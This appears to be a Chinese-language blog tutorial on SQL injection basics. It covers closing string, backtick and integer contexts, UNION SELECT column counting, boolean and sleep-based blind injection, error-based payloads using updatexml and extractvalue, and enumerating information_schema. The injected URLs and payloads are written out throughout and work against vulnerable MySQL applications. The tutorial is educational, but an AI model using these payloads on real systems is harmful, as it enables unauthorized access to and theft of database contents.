SQL注入基础

作者: 渺小Y | 来源:发表于2018-08-03 15:22 被阅读11次

什么是SQL注入

拼接sql得到想要的数据或反应, 而这些sql是不常见的编程逻辑的sql.

SQL语句闭合问题

字符串类型闭合
1. 单引号 - 值的类型是字符串类型
  一般是对where ,if 等表达式的条件值进行引用
  注入URL:
```
http://x.x.x.x/name=test' and '1'='1' %23
```
  后端SQL:
```
select c1,c2 from db.table where name='test' and '1'='1' #'
```
  解释一下: %23就是#quote后的值, 其中' and '1'='1' #为注入的SQL
  
  可以发现, name是字符串类型字段, 字符串类型必须使用单引号将变量值括起来才符合SQL语法
  其中 '1'='1' 就是注入点, 可以换成自己的语句
2. 反引号 - 字段名
  一般是对 group by, order by 等对字段进行操作的表达式中字段名的引用
  注入URL:
```
http://x.x.x.x/order=name`, if(1=1,1,2) %23
```
  后端SQL:
```
select c1,c2 from db.table order by `name`, if(1=1,1,aaa) #`
```
  解释一下:
  - URL中的name`, if(1=1,1,2) %23, name后的反引号提前把name闭合,紧接着注入了, if(1=1,1,2) %23, %23是#, 直接把后面的sql语句给注释了
  - if里面的aaa是一个不存在(乱写的)的字段名, 其中1=1就是注入点, 可以换成自己的语句, 观察页面变化来进行盲注
  - order by x,y 可以根据多个字段名排序, 当后端做了变量检查可以尝试使用逗号多个字段排序来注入
  - 注意: group by, order by 字段名的时候, 是可加可不加反引号的, 需要尝试才知道后端代码是否加了反引号
整数类型闭合

注入URL:
```
http://x.x.x.x/id=1 and 1=1 %23
```
后端SQL:
```
select c1,c2 from db.table where id=1 and 1=1 #
```
解释一下:
整数类型的变量过滤无需单引号, 同样1=1为注入点

SQL注入分类

UNION SELECT

union select 可以将后面的select出的数据与前面的select出的结果集进行合并

image.png
union select 所需前置条件
1. union select的字段数目必须与前面select语句的数目一致
  办法: 使用order by N 进行猜测(N是整数, 代表第几个字段)
  select depts.id, depts.name from depts order by 1
  这里的1是指字段的位置, 代表使用第一个字段进行排序, 如果使用超出字段数目的位置参数排序就会报错, 由此可以推算出select的字段个数, 如下图:
  
  image.png
2. union select的字段的类型必须与前面的匹配
  办法: 使用 null 代替, 因为所有类型字段都支持null, 如下图所示
  select depts.id, depts.name from depts where id = 1 union select null, null
  
  image.png
盲注

前面的union select 可以将数据暴露到页面上, 但是有些情况无法使用union select, 比如:
- union select 被WAF过滤
- http页面返回内容没有变化
盲注原理:
顾名思义, 盲注就是我们不能直接的看到数据的展示或变化
盲注SQL:
```
select depts.id, depts.name from depts where id = 1 and if(ascii(substring(database(), 1 ,1)) = 101,1,0)
```
SQL解释:
- database() 当前数据库的名字, 在这里是"ec_ops"
- substring('ec_ops',1,1) 取出'ec_ops'的第一个字符'e'; 第一个1是第一次, 第二个1是步进值为1
- ascii('e') 将'e'字符转成ascii码; 'e'的ascii为101
- if(ascii('e')=101,1,0) 当ascii('e')=101为true的时候, 返回1(既true), 否则返回0(既false);
- id = 1 and if() -- 当左右两个条件同时为true时, 才展示数据,这样可以根据页面数据变化来判断if里面猜测是否正确, if(xx=xx,1,0) 条件为真的值(例子中是1)也可以换成sleep(1), 成功则睡一秒, 根据访问延迟来判断是否成功
注: 英文可见字符的ascii码范围: 32-127, 逐步实验可以撞出库名的所有字符的ascii码, 也就得出完整的库名

报错
使用报错注入的前置条件
web后端service开启了报错开关允许打印到web前端显示
- and 1=(updatexml(1,concat(0x3a,(select user())),1)) 获取当前数据库用户
- and extractvalue(0x7e,concat(0x7e,user())) 获取当前数据库用户
- and exp(~（select * from(select user())a）) 获取当前数据库服务器类型
- and linestring(id) 快速获得当前库名、表名
- ....

练手

MySQL
information_schema 存放着数据库的所有信息, 包括有哪些库, 表, 字段
- select schema_name from information_schema.schemata -- 所有数据库名
- select table_name from information_schema.tables where table_schema = 'db_name' --获取db_name的所有表
- select column_name from information_schema.columns where table_schema = 'db_name' and table_name = 'table_name' --获取db_name.table_name的所有字段名

常见注入点

WHERE column_name [ = | like ] value
select c1,c2 from tables where id = 1 [ and | having ] condition
使用 and / having 或 "union select" 连接其他sql语句

image.png
ORDER BY column_name

例1: select id, name from ec_ops.depts order by if(1=1,id,name)
当1=1为真时, 以id进行排序, 否则以name排序, 1=1可以换成其他sql语句
注意: 如果将if里的id换为sleep(1), 每条数据都会睡一次, 如果有300条数据则睡300秒, 即使加limit 1也没用慎用

例2: select id, name from ec_ops.depts order by rand()
随机排序

例3:
```
select id from depts order by 
    case 
        when 1=1          # 当1=1为真以id排序
            then id 
        when 1=2          # 当1=2为真以name排序
            then name
        when 1=3          # 当1=3为真以title排序
            then title
        else author       # 以上条件都不符合则以author排序
    end
```
总结: order by就是利用不同字段排序, 来观察数据变化从而进行盲注

网友评论

本文标题：SQL注入基础

本文链接：https://www.haomeiwen.com/subject/ifpyvftx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

SQL注入基础

什么是SQL注入

SQL语句闭合问题

字符串类型闭合

整数类型闭合

SQL注入分类

UNION SELECT

盲注

报错

练手

常见注入点

相关文章

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读

SQL用法

sql注入

程序员